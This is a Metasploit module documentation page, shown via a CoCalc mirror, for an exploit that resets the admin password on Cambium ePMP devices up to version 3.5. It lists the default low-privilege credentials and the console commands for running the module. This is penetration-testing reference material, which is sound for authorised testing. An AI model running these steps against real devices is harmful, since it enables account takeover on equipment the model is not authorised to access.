CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/auxiliary/admin/http/epmp1000_reset_pass.md
Views: 1904
This module exploits an access control vulnerability in Cambium ePMP device management portal. It requires any one of the following non-admin login credentials - installer/installer, home/home, readonly/readonly - to reset password of other existing user(s) including 'admin'. All versions <=3.5 (current as of today) are affected. The module has been tested on versions 3.0-3.5-RC7.
Verification Steps
Do:
use auxiliary/scanner/http/epmp1000_reset_pass
Do:
set RHOSTS [IP]
Do:
set RPORT [PORT]
Do:
set TARGET_USERNAME admin
Do:
set NEW_PASSWORD newpass
Do:
run